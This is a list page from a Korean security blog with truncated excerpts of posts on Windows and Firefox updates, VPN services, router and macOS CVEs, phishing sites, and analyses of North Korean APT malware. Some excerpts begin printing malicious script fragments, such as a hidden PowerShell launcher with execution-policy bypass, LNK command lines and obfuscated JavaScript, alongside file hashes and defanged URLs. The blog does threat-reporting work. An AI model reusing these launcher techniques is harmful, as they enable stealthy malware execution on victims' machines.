마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 보안 업데이트 가 진행이 되었습니다.물론 새로운 기능도 포함입니다.윈도우 10 KB5049981의 새로운 기능Windows 커널 취약 드라이버 차단 목록 파일(DriverSiPolicy.p7b) 정책 파일인 하나의 수정 사항이 나열되어 있음차단 목록 파일에는 Windows에서 상승한 권한을 얻으려고 악용될 수 있는 취약점이 포함된 것으로 알려진 커널 드라이버 목록이 포함돼 있음KB5049981 누적 업데이트와 관련된 몇 가지 알려진 문제첫 번째로 알려진 문제는 업데이트로 인해 OpenSSH(Open Secure Shell) 서비스가 시작되지 않아 SSH 연결이 중단될 수 있다는 것다른 하나는 특정 Citrix 구성 요소 때문에 이 업..
오늘은 우리가 정말로 존경하지 않는 북한 김수키(Kimsuky)에서 만든 코발트 스트라이크(Cobalt Strike) 악성코드-test.zip(2025.1.11)에 대해 글을 적어보겠습니다.해당 악성코드는 다음과 같습니다.파일명:test.zip사이즈:15,282 BytesMD5:8d3dd8b5a883a2080525a11807b2a6e1SHA-1:da3cbfad064e12c4334161a00335c0176011d0c2SHA-256:c2faf67cab95cba996e6b705e9579ffbc53fec55b09064308c2c38dbf6018077Powershell 코드StringData{ namestring: Type: Text Document Size: 391,2KB KB Date modi..
오늘은 북한에서 대한민국 및 해외의 공작활동을 총괄하는 군 소속 첩보기관으로 공작원의 양성, 침투, 정보수집, 파괴공작, 요인암살, 납치, 테? 등 다양한 임무를 수행 아무튼 대한민국 안보에 전혀 도움 안되는 정찰총국 산하의 해킹 단체 김수키(Kimsuky)에서 한국방위산업학회 향한 악성코드인 국방위산업학회 방위산업 디지털 혁신 세미나(계획)(2025.1.12)에 대해 알아보겠습니다.해당 악성코드는 출발은 이메일로 시작하며 이메일 내용은 다음과 같습니다.[최초 수신 메일] 한국방위산업학회 방위산업 디지털 혁신 세미나 계획을 전파 드립니다.안녕하십니까,방산발전을 위해 분투하시는 회원님들의 무궁한 발전을 기원하며 항상 본 학회에 보내주시는 성원에 감사드립니다.2024.12.20(금) 10:00, 육군회관에서..
오늘은 모질라 재단에서 제공을 하는 파이어폭스 134.0 보안 업데이트에 대해 알아보겠습니다.Firefox는 이제 Linux에서 터치패드 누르기 동작을 지원Windows에서 HEVC 비디오 콘텐츠의 하드웨어 가속 재생이 지원Ecosia의 가용성은 오스트리아, 벨기에, 이탈리아, 네덜란드, 스페인, 스웨덴 및 스위스와 함께 독일 지역의 모든 언어로 확장새로워진 새 탭 레이아웃이 미국과 캐나다의 사용자에게 출시되고 있으며 위치가 변경된 로고와 날씨 위젯을 통해 웹 검색,바로 가기, 추천 스토리를 상단에 우선시할 수 있습니다.이번 업데이트로 인해서 추천 스토리 카드 UI 변경 사항이 포함되어 있으며 더 큰 화면을 사용하는 사용자는 최대 4개의 열을 볼 수 있어 공간 활용도가 높아집니다.보안 업데이트 내용CVE..
오늘은 텔레그램 사용자 정책 위반 사칭 피싱(Phishing) 사이트 인 hvil-telegram(.)org(2025.1.6) 에 대해 알아보겠습니다.최근에는 러시아 태생의 니콜라이 두로프(Николай Дуров, Nikolai Durov) 파벨 두로프 형제가 개발하여 2013년 8월에 iOS용으로 처음 출시 현재는 안드로이드,Windows,Windows Phone, 리눅스, macOS, 브라우저까지 지원하는 메신저이며 뭐 보안이 좋다고 하지만 다 허점이 있으며 보안 메신저 들도 한 놈이 사고 치면 다 잡히어져 있습니다.일단 해당 텔레그램은 딥페이크(Deepfake) 때문에 문제가 되는 메신저입니다.일단 해당 텔레그램을 계정이 사용정책이 위반했다고 피싱 사이트로 유도를 하는 방식을 취하고 있습니다.해당..
오늘은 가짜 CAPTCHA(캡차)을 이용한 Lumma Stealer를 통해 유포되는 악성코드에 대해 글을 적어보겠습니다. 해당 Lumma Stealer는 2022년 8월부터 러시아 어 포럼의 MaaS(Malware-as-a-Service) 모델을 통해 제공되었으며 주로 암호화폐 지갑(가상화폐 지갑)과 2단계 인증(2FA) 브라우저 확장 프로그램을 표적으로 삼은 후 궁극적으로 피해자의 컴퓨터에서 중요한 정보를 훔치는 것을 하고 있습니다.Lumma Stealer는 맬웨어 서비스 모델로 운영되므로 구독을 구매할 재정적 여력이 있는 사람이라면 누구나 이용할 수 있으며 손상된 컴퓨터에서 악성코드 활동을 모니터링 하고 관리할 수 있는 명령 및 제어(C2) 패널에 대한 액세스가 포함이 됩니다.일단 간단하게 제가 한번..
NordVPN(노드 VPN) 에서 양자 컴퓨팅에 대한 내성을 위한 새로운 기능인 NordVPN(노드 VPN) 포스트 퀀텀 기능을 추가했습니다.먼저 양자 컴퓨터에 대해 알아보아야 합니다.양자 컴퓨터라는 것은 양자역학에서 양자 얽힘, 중첩, 텔레포테이션 등의 효과를 이용해 계산하는 컴퓨터입니다. 즉 기존의 컴퓨터 0,1 이 아닌 0과 1을 동시에 공존시킬 수가 있는 컴퓨터를 이야기합니다.현존 최고의 슈퍼 컴퓨터가 수백 년이 걸려도 풀기 어려운 문제도 단 몇 초 이내의 어마어마한 속도로 빠르게 풀 수이었어요 가 있는 능력이 부여된다는 뜻이며 이렇게 되면 긍정적인 문제가 있겠지만, 부정적으로 암호들이 쉽게 해독이 될 수가 있다는 것입니다. 즉 기존의 암호는 크게 인수분해, 이산 로그, 타원곡선 이산 로그 문제 ..
오늘은 정체를 모를 APT에서 만든 교통 범칙금 과태료 미납 내역.lnk(2024.7.14)에 대해 글을 적어보겠습니다.파일명: 교통 범칙금 과태료 미납 내역.lnk사이즈:2,680 BytesMD5:354d922cc4b4478d04c215cac5f28c89SHA-1:77943769415809939fb82330d62db96b207df5b9SHA-256:42553efd4d11f721fb221fcf226d4b4aa616e5b0018e246954deb52e0a035cd0악성코드 내용StringData{ namestring: Check (t)he fine relativepath: ..\..\..\Windows\System32\cmd.exe workingdir: %CD% commandlinea..
오늘은 북한 라자루스(Lazarus) 단체에서 만든 브라우저 스틸러인 11.js(2024.12.28)에 대해 알아보겠습니다. 일단 해당 악성코드는 자바스크립트로 구성이 되어 있는 것이 특징이며 기본 목적은 간단합니다.먼저 악성코드 해쉬값은 다음과 같습니다.파일명:11.js사이즈:47,274 BytesMD5:36ebb732ac83309f65dd5f54dc75cce5SHA-1:538053824f395bf2fd879ebf4a32b99eab03b678SHA-256:ab754242fe28fa282a9169e47c3e12752fa444c22945cd220c657bcab561b983일단 개 난장판으로 되어 있는 것을 대충 난독화 해제를 하면 다음과 같이 된 것을 확인을 할 수가 있습니다.'phepccionb'(,)'..
오늘은 TP-Link 공유기 CVE-2024-53375 취약점 간단 분석에 대해 글을 적어보겠습니다.일단 HomeShield 기능이 존재하는 TP-Link 공유기 들은 다음과 같습니다.TP-Link Archer SeriesTP-Link Deco SeriesTP-Link Tapo Series일단 해당 취약점이 공개된 부분만 통해서 적어 봅니다.문제의 코드function AVIRA_GATHER: tmp_get_sites (app_form) local data = json.decode(app_form.data) local res = {} local result = {} debug("") debug("===> opcode 0x0523: tmp_get_sites") local ownerId =..
오늘은 노드 VPN 스마트폰 IP 우회 변경 사용법(3개월 무료)에 대해 글을 적어보겠습니다. NordVPN은 유료 개인용 가상사설망 서버 이며 윈도우,MacOS,리눅스를 지원을 하고 있으며 스마트폰에서는 안드로이드와 iOS 를 지원을 하고 있습니다. 그리고 안드로이드 TV에서 사용할 수가 있습니다.노드 VPN의 본사는 데이터 보존법의 의무가 없으며 여기서 제일 중요한 것은 5개의 눈(Five Eyes), 14개의 눈 (Fourteen Eyes) 해당 동맹에서 안전하며 파나마에 있습니다.그리고 2019년 10월 29일 노드 VPN은 노-로그 감사 보고서를 공개 보안 컨설팅 회사와 파트너십을 맺고 램 서버로 인프라 교체, 버그 바운티 프로그램 그리고 2022년 6월에서는 인도는 VPN 회사와 ISP에게 5..
오늘은 세계적으로 유명한 APT 조직 APT 북한 APT 리퍼(Reaper, APT37)에서 만든 악성코드 인 동북공정(미국의회조사국(CRS Report). pdf.lnk(2024.4.3)에 대해 글을 적어보겠습니다.해당 악성코드 해쉬파일명:동북공정(미국의회조사국(CRS Report).pdf.lnk사이즈:58,894,509 BytesMD5:358122718ba11b3e8bb56340dbe94f51SHA-1:0c61effe0c06d57835ead4a574dde992515b9382SHA-256:b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56해당 악성코드에 포함된 파워셀 코드StringData{ namestring: relativ..
KB5048685 업데이트는 Windows 11 23H2 사용자에게 여러 문제를 일으키는 것으로 보이는 버그입니다.해당 보안 업데이트 2024년 12월 버전에서 업데이트 입니다.윈도우 11 KB5048685 때문에 시작 메뉴 및 Wi-Fi가 실패할 수 있음컴퓨터를 업데이트한 사용자는 시작 메뉴에 액세스 하려고 할 때 시작 메뉴가 정지되고 있다고 보고가 되고 있습니다.Windows 11 24H2용 KB5048667을 설치한 사용자에게 영향을 미치는 유사한 문제도 보고어두운 모드가 활성화된 경우에도 시작 메뉴에 흰색 배경이 표시될 수도 있습니다.마이크로소프트는 아직 문제를 인정하지 않았지만 Citrix 웹 사이트에서 발견한 윈도우 최신의 지원 기사에는 KB5048685 업데이트가 설치된 경우 Windows ..
오늘은 Kimsuky(김수키)에서 만든 자유 아시아 방송으로 위장해서 특정 북한 인권운동가 노린 악성코드 인 log_processlist.ps1(2024.12.02)에 대해 글을 적어보겠습니다.일단 해당 악성코드는 다음과 같은 사이트에서 유포가 되었습니다.hxxp://bureopen(.)store/1127일단 사이트에 접속을 하면 다음과 같은 화면을 볼수가 있으며 first.txt,log_processlist.ps1,sec.txt,start.txt먼저 log_processlist.ps1부터 보겠습니다.파일명:log_processlist.ps1사이즈:2,176 BytesMD5:d38a6f924abf59eac2f962dcbff6703cSHA-1:a26fbfa800e36e43f6e0e5ed7a9dcad7756..
오늘은 그냥 간단하게 다시 돌아온 LockBit 4.0 랜섬웨어(Ransomware)에 대해 알아보겠습니다.2019년 등장한 락빗(LockBit) 은 처음 등장을 했고 섬웨어를 공격자에게 판매하여 수입을 얻는RaaS(Ransomware as a Service) 형태로 운영을 하는 것이 특징이며 예전에는 입사지원서로 위장한 메일등으로 파일들을 첨부해서 발송해서 사용자가 실행을 해서 랜섬웨어에 감염이 되는 방식을 따릅니다.LockBit은 미국 정부 소속 DSIB 와 같은 평판이 좋은 표적을 포함하여 더 자주 피해를 입기 시작일단 제가 사용한 랜섬웨어 해쉬값은 다음과 같습니다.MD5:8ff61e4156c10b085e0c2233f24e8501SHA-1:69d50a8efd73c619aa36113ec04368db8..
오늘은 북한 김수키(Kimsuky)에서 만든 악성코드-1.txt(2024.12.14) 애 대해 글을 적어보겠습니다. 일단 어떤 방식으로 유포가 되는지 모르겠지만 일단 텍스트 파일에 PowerShell 코드가 있으며 해당 파일을 실행을 하면 드롭 박스에 업로드된 txt 파일에서 실행을 하는 것이 특징입니다.일단 해쉬값은 다음과 같습니다.파일명:1.txt사이즈:1,137 BytesMD5:aa793be3a980534b116c6744b77029e5SHA-1:71de1f8e9d109354d571df180563cb6ed1786792SHA-256:3e1353241852bc3ece184d55f1a2a194bdbe0a4ee6908d7a7827673b7fa38929악성코드에 포함된 PowerShell 코드$BPS = Jo..
오늘은 북한 해킹단체 김수키(Kimsuky) 에서 만든 금융거래확인서로 위장한 악성코드 confirmation.chm(2024.12.10)에 대해 글을 적어보겠습니다. 일단 해당 금융거래확인서가 발생이 된 것은 2024.9.23일로 확인이 되면 혁신성장촉진자금(운전) 부분으로 돼 있으며 경기도 이천 쪽 중소기업으로 대상으로 타겟한것 같기도 합니다. 먼저 악성코드 해수값은 다음과 같습니다.파일명:confirmation.chm사이즈:312,240 BytesMD5:08b4bcee92417560d61c5f29649cdfadSHA-1:38032503b59125fb464e1b7aaa449d33caaafc29SHA-256:e6bcdb402999f6f35351c0b9a1be84345aea88c3f662ba27341d7..
오늘은 애플에서 제공하는 운영체제인 Mac OS에서 CVE-2024-44175 취약점에 대해 알아보겠습니다.해당 취약점인 CVE-2024-44175은 macOS의 diskarbitrationd에서 발생한 TOCTOU(Time of Check to Time of Use) 취약점이며 symbolic link를 이용한 sandbox escape 및 privilege escalation 공격을 가능하게 만드는 취약점 입니다.해당 취약점은 UserFS(사용자 모드 파일 시스템) 처리 과정에서 발생하게 돼 있으며 검증이 제대로 이루어지지 않아서 발생합니다.DAFileSystemMountWithArguments 함수diskarbitrationd는 UserFS 파일 시스템을 마운트 하기 전에 먼저 UserFS 지원 여..
스웨덴에서 기반을 두는 오픈 소스 VPN 인 Mullvad VPN 에서 CVE-2024-55884 심각한 보안 취약점이 발견되었습니다.해당 Mullvad VPN 서비스는 극강의 투명성, 물리 서버,Wire Guard를 통한 빠른 속도,RAM 서버 구축을 통한 개인정보 보호, 멀티 홉,Tailscale 파트너쉽트래픽 기록DNS 요청 기록연결이 이루어진 시각, 연결이 끊긴 시각, 연결유지시간 등 모든 종류의 타임스탬프를 포함한 연결 기록IP 주소 기록사용자 대역폭 기록들은 저장 되지 않습니다.아무튼, 개인적으로 두더지 VPN이라고 부르는 Mullvad VPN에 대한 CVE-2024-55884 심각한 보안 취약점입니다.사이버 보안 회사인 X41 D-Sec GmbH는 Mullvad VPN 애플리케이션의 화이트박..
오늘도 대한민국의 안보를 노리는 북한 APT인 김수키(Kimsuky)에서 만든 악성코드인 열차 9월10일 원고(화)_4. bat(2024.12.02)에 대해 글을 적어 보겠습니다. 일단 해당 악성코드는 K 본부의 한민족방송에서 방송하는 대북 관련 시사 교양 프로그램인 통일열차 제작팀을 노린 것을 추정되면 통일열차 진행자는 이x걸 아나운서이며 방송시간은 매일 자정 5분부터 새벽 1시까지 입니다.일단 먼저 해당 악성코드 해쉬값은 다음과 같습니다.파일명: 열차9월10일원고(화)_4. bat사이즈:327 BytesMD5:c0b447e45be32bd6ceba8c6455472b37SHA-1:5b191427f2d47efe8a8e7bb195f1b4a9f5a2c585SHA-256:5306582c8a24508b594fed..
악의적인 목적이 있는 사람들이 워드프레스(WordPress) 직접 악용 가능한 결함이 있는 다른 플러그인을 설치하고 활성화하기 위해 Hunk Companion 플러그인의 심각한 취약점을 악용하고 있음해당 취약점은 알려진 취약점과 사용 가능한 익스플로잇이 있는 오래된 플러그인을 설치함으로써 공격자는 RCE(원격 코드 실행), SQL 삽입, XSS(교차 사이트 스크립팅) 결함으로 이어지는 대규모 결함 풀에 액세스 하거나 백도어 관리자 계정을 생성 가능취약한 플러그인 설치Hunk Companion은 사용자 정의 가능한 WordPress 테마 제공업체인 ThemeHunk에서 개발한 테마의 기능을 보완하고 향상하도록 설계된 WordPress 플러그인이므로 독립 실행형 플러그인이 라기보다는 추가 기능에 가까운데 H..
오늘은 일본 みずほ銀行(미즈호은행) 피싱 메일에 대해 간단 분석을 해보겠습니다.일단 みずほ銀行(미즈호은행)은 미쓰비시 UFJ 은행, 미쓰이스미토모은행과 함께 일본의 3대 메가뱅크 중 한 곳으로 미즈호 은행의 전신(前身)인 제일은행은 일본에서 처음으로 설립된 은행이자 일본의 첫 번째 주식회사입니다.일단 개인적으로 받은 이메일에서 있어서 한번 글을 적어 보겠습니다.이메일 내용平素より、みずほ銀行をご利用いただきありがとうございます。当社では、犯罪収益移転防止法に基づき、お取引を行う目的等を確認させていただいております。また、この度のご案内は、当社ご利用規約第5条1項3に基づくご依頼となります。お客様お客様の直近の取引についていくつかのご質問がございます、下記のリンクをアクセスし、ご回答ください。 hxxps://wh853(.)top?token..
마이크로소프트에서 제공하는 OS인 윈도우 10,윈도우 11 에 대한 각각 KB5048652,KB5048667,KB5048685 보안 업데이트가 진행이 되었습니다.윈도우 10KB5048652의 새로운 기능KB5048652 업데이트에는 장치 마더보드를 교체하고 윈도우 10이 활성화되지 못하게 하는 버그를 포함하여 Windows 10의 수많은 버그에 대한 수정 사항이 포함Sysprep /generalize]수정됨: 해당 명령은 0x80073cf 오류로 말미암아 실패 속성을 이미 제거하고 패키지를 제거하려고 할 때 발생앱 목록 백업 수정됨:Win32 바로가기가 클라우드에 백업 되지 않을 수 있음클라우드 파일 복사 수정됨: 클라우드 파일 제공자 폴더에서 파일을 끌어서 놓으면 복사본이 아닌 이동이 발생할 수 있음마..
오늘은 ROKRAT 대북 관계자를 타켓팅 하는 APT 37(Reaper,리퍼)에서 만든 악성코드-김X성강의자료.lnk(2024.12.06)에 대해 알아보겠습니다. 해당 APT 조직들은 해외 공공 및 민간 부문을 표적으로 삼는 데 중점 두고 있으며 APT 37, Reaper,Reaper Group,Red Eyes,Ricochet Chollima, ScarCruft,TA-RedAnt,Venus 121 으로 불리기도 하는 하나도 존경하고 경애하지 않고 자유대한민국의 전혀 도움되지 않는 북한의 정찰총국 산하 APT37 에서 만든 악성코드이며 개인적으로도 해당 글을 쓰는 시점인 2024.12.06 에 기준으로 적어 봅니다. 아마도 私見으로는 현재 비상계엄이니 대통령 탄핵이니 국가가 혼란한 상황에서 유포되는 시점이..
일단 해당 악성코드는 어제 작성한 글인 pay.bat에서 악성코드를 실행했을 때 드롭박스에서 연결된 파워셀 코드입니다.일단 해쉬값은 다음과 같습니다.파일명:system_first.ps1사이즈:1,532 BytesMD5:e598db51ddee48b7c351b68aebf76ebfSHA-1:60cdedb45513069a5d67310529966681bd0b4663SHA-256:ed55bb081d0e4dfeefd7af35dbb0a0481be192d3d0759631c951f7d6d5737749입니다.[소프트웨어 팁/보안 및 분석] - APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27) APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)오늘은 APT 김..
오늘은 APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)에 대해 글을 적어 보겠습니다.해당 악성코드는 배치 파일을 악용하는 것이 특징이면 일단 실행이 되면 현재 폭파된 드롭박스에서 무엇가 다운로드 하는 것 같습니다.해시파일명: pay.bat사이즈:1,687 BytesMD5:b262ac518c0114f414aaedbb4ef7c728SHA-1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83SHA-256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b악성코드에 포함된 코드@echo offpowershell/W 1 -ep bypass -w hidden -command $cmkGnaBV=..
오늘은 텔레그램으로 속이는 정체 모를 APT-Telegram(.)txt(.)lnk(2024.11.27)에 대해 알아보겠습니다.텔레그램은 2013년 8월 14일에 출시하고 개발 및 운영 중인 오픈 소스 모바일 메신저이며 러시아 태생의 니콜라이 두로프(Николай Дуров, Nikolai Durov),파벨 두로프 형제가 개발하여 2013년 8월에 iOS용으로 처음 출시 현재는 안드로이드·Windows, Windows Phone,리눅스,macOS,브라우저까지 지원하는 메신저이며 한때에는 카카오 톡 사찰 논란이 터지자 많은 사람이 사이버 망명을 하기도 했으면 해당 부분에서 긍정적인 부분보다 아마도 약쟁이, n번방 X착취물 제작 및 유포 사건, 2024년 텔레그램 딥페이크 음X물 유포 사건 이 대표적일 것입니..
해커 팀은 거의 전체 Windows/Office 소프트웨어 라이센스 보호를 해독했다고 주장해당 방법을 통해서 거의 모든 버전의 Windows 및 Office를 영구적으로 활성화할 수 있다고 주장윈도우 및 Office 설치에는 정품 인증이 필요뒤에서 또는 사용자가 제품 키를 입력할 때 발생할 수 있음해결 방법과 해킹은 오랫동안 사용 가능널리 사용되는 선택 중 하나는 PowerShell 프롬프터에서 한 줄의 지침을 실행하여 Windows 8 이상 또는 Office를 활성화솔루션 작성자는 이제 해당 기능을 더 많은 Windows 및 Office 제품으로 확장하는 방법을 찾았다고 주장새로운 방법은 모든 윈도우 클라이언트 또는 서버 버전에서 작동하며 ESU(확장 보안 업데이트) 및 Microsoft CSVLK(고..
모질라 재단에서 제공을 하는 브라우저인 파이어폭스 브라우저에 대한 보안 업데이트 및 반송 추적 보호 및 기타 향상된 기능이 포함된 업데이트가 진행이 되었습니다.반송 추적 방지 및 보안 수정을 포함하여 몇 가지 주요 개선 사항이 포함일부 광고주 및 데이터 브로커는 추적을 위해 리디렉션을 사용합니다. 이 프로세스는 매우 빠르게 진행되므로 사용자에게는 보이지 않음핵심 아이디어는 간단합니다. 링크를 클릭하면 대상이 열리기 전에 먼저 추적 서버가 열릴 것이고 반송 추적 보호 기능은 정기적으로 쿠키와 사이트 데이터를 삭제하여 이를 차단하는 것이 목적해당 기능은 Firefox에서 향상된 추적 방지 기능을 엄격으로 설정한 사용자에게만 활성화 기본 값이 아닙니다.쿠키와 사이트 데이터를 삭제해야만 반송 추적기에 반응하는 ..
오늘은 북한 APT인 북한 김수키(Kimsuky)양도소득 과세표준 신고 및 납부계산서로 위장한 악성코드인 out.lnk(2024.11.26)에 대해 알아보겠습니다. 소득세의 일종이며 양도소득세(讓渡所得稅)는 자산양도로 말미암아 벌어들인 자본이익에 대해 부과하는 세금을 가리키는 말이며 줄여서 양도세라 부르기도 하고 있습니다. 일단 해당 악성코드는 언제나 변하지 않는 lnk 방식으로 악성코드를 유포하는 것은 똑같습니다.해쉬값파일명:(김X경님) 양도소득 과세표준 신고 및 납부계산서.pdf.lnk사이즈:6,070 BytesMD5:adcd2bcd43a6f495facfe31e71d4e2b8SHA-1:4bdbf8733e178d50f1763d5999b58bb889138f43SHA-256:f5740e4027ad48231..